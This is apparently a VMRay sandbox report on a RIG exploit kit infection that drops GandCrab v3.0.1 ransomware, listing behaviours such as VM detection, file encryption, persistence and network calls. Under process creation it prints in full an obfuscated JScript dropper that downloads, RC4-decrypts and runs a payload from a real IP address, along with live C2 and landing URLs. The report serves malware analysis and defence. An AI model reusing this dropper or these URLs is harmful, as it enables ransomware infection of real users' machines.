RIG EK Drops GandCrab v3.0.1 | VTI
Logo
Try VMRay Analyzer
VTI SCORE: 100/100
Target: win7_64_sp1 | ie
Classification: Dropper, Trojan, Downloader, Ransomware

http://youtubeconverter.slyip.net/WpLTQb?browser=ie&countryname=United+States

URL

Created at 2018-05-11 13:20:00

...

Notifications (2/4)

Due to a reputation service error, no query could be made to determine the reputation status of any contacted URL.

Some extracted files may be missing in the report since the maximum number of extracted files was reached during the analysis. You can increase the limit in the configuration settings.

Some memory dumps may be missing in the reports since the total dump size limit was reached during the analysis. You can increase the limit in the configuration settings.

One or multiple processes crashed. As a result, the analysis results may be incomplete and may not fully represent the behavior of the sample.

Severity Category Operation Classification
5/5
Anti Analysis Tries to detect virtual machine -
  • Reads out system information, commonly used to detect VMs via registry. (Value "Identifier" in key "HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0").
    ...
5/5
File System Modifies application directory -
  • Modifies "c:\program files\microsoft sql server compact edition\crab-decrypt.txt".
    ...
  • Modifies "c:\program files\microsoft sql server compact edition\v3.5\crab-decrypt.txt".
    ...
  • Modifies "c:\program files\microsoft sql server compact edition\v3.5\desktop\crab-decrypt.txt".
    ...
5/5
OS Modifies certificate store -
  • Adds a certificate to the local "my" crab-decrypt.txt list by file.
    ...
  • Adds a certificate to the local "my" certificate trust list by file.
    ...
5/5
File System Creates an unusually large number of files -
5/5
File System Encrypts content of user files Ransomware
  • Encrypts the content of multiple user files. This is an indicator for ransomware.
    ...
5/5
PE Drops PE file Dropper
5/5
PE Executes dropped PE file -
4/5
Process Creates process -
  • Creates process "cmd.exe /q /c cd /d "%tmp%" && echo /**/function V(k){var y=a(e+"."+e+/**/"Reques\x74.5.1");T="G";y["se"+"tProxy"](n);y["o"+"pen"](T+"ET",k(1),1);y["Option"](n)=k(2);y.send();y["Wai"+"tForResponse"]();W="respo"+"nseText";if(40*5==y.status)return _(y[W],k(n))};function _(k,e){for(var l=0,n,c=[],F=255,S=String,q=[],b=0;256^>b;b++)c[b]=b;ta="charCodeAt";for(b=0;256^>b;b++)l=l+c[b]+e[ta](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q["join"]("")};try{M="WSc";u=this[M+"ript"],o="Object";P=(""+u).split(" ")[1],M="indexOf",m=u.Arguments,e="WinHTTP",Z="cmd",U="DEleTefIle",a=Function/**/("QW","return u.Create"+o+"(QW)"),q=a(P+"ing.FileSystem"+o),s=a("ADO"+"DB.Stream"),j=a("W"+P+".Shell"),x="b"+Math.floor(Math.random() * 57)+".",p="exe",n=0,K=u[P+"FullName"],E="."+p;s.Type=2;s.Charset="iso-8859-1";try{v=V(m)}catch(W){v=V(m)};Q="PE\x00\x00";d=v.charCodeAt(21+v[M](Q));s.Open();h="dll";if(037^<d){var z=1;x+=h}else x+=p;s.WriteText(v);s.savetofile(x,2);C=" /c ";s.Close();i="regs";z^&^&(x=i+"vr32"+E+" /s "+x);j["run"](Z+E+C+x,0)}catch(EE){};q[U](K);>u32.tmp && start wscript //B //E:JScript u32.tmp "LZytas3d" "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)"".
    ...
  • Creates process "https://www.torproject.org/download/download-easy.html.en".
    ...
4/5
File System Associated with malicious files Trojan
4/5
Network Downloads data Downloader
  • URL "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0".
    ...
  • URL "http://95.142.39.142/?MzUzMTAy&ZNAVNHmAYOK&fdfsdf3gf=wn_QMvXcLxXQFYbCKuXDSKZDKU7WGUaVw4-dhMG3YprNfynz0uzURnLytASVVFmRrbMdL7dTO&rqWIetbNyd=Zmx5&t4dsdfa4=VLjiRGDegE0zY9aUFNG9v2v30aGzBXJiZaL_xCMYQxG95qdE7UL0VT8zrgdecIkzibfqWBT_A&hqNrCjJSgrWztKY=c2Vh&devbnQaWlmZ=cmVzb3J0&JVcVIIe=c2My&HheAqNwtJfbNda=c2hha2U=&YiuYJvmcJMhvOk=c3BvcnQ=&PQYFBaAantoAeLc=c3BvcnQ=".
    ...
3/5
Persistence Installs system startup script or application -
  • Adds ""C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Roaming\Microsoft\cjrckv.exe"" to Windows startup via registry.
    ...
3/5
Network Performs DNS request -
1/5
Process Creates system object -
  • Creates mutex with name "Global\pc_group=WORKGROUP&ransom_id=e65fbbbf9c354b42".
    ...
1/5
Process Overwrites code -
1/5
Network Connects to HTTP server -
  • URL "http://95.142.39.142/?MzUzMTAy&ZNAVNHmAYOK&fdfsdf3gf=wn_QMvXcLxXQFYbCKuXDSKZDKU7WGUaVw4-dhMG3YprNfynz0uzURnLytASVVFmRrbMdL7dTO&rqWIetbNyd=Zmx5&t4dsdfa4=VLjiRGDegE0zY9aUFNG9v2v30aGzBXJiZaL_xCMYQxG95qdE7UL0VT8zrgdecIkzibfqWBT_A&hqNrCjJSgrWztKY=c2Vh&devbnQaWlmZ=cmVzb3J0&JVcVIIe=c2My&HheAqNwtJfbNda=c2hha2U=&YiuYJvmcJMhvOk=c3BvcnQ=&PQYFBaAantoAeLc=c3BvcnQ=".
    ...
  • URL "http://95.142.39.142/?MTAzNDE3&ofvcTlM&NOhFPrkEXYygcYr=c2Vh&XFZaDrsXTiVcOS=c2Vh&CQXjFXpCD=bWF0Y2h1cA==&uZwiNDOCVY=c3BvcnQ=&DGPafWFTVR=c2My&fdfsdf3gf=xXzQMvWebRXQCJ3EKvncT6NEMVHRHkCL2YqdmrHVefjaelWkzrfFTF_yozKATgSG6_dtdfJR&t4dsdfa4=DQbiiUHRfwQ1n49cBwsS9K6n20XUnUefh8SH-UCEYA5M-pOUFLcz2VX9yLMkc8Mm90vC62Jg&KMWDJCCKgTcdNl=cmVzb3J0&wAORzkZnO=cmVzb3J0".
    ...
1/5
Process Process crashed -
  • Process "c:\program files (x86)\internet explorer\iexplore.exe" crashed.
    ...
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image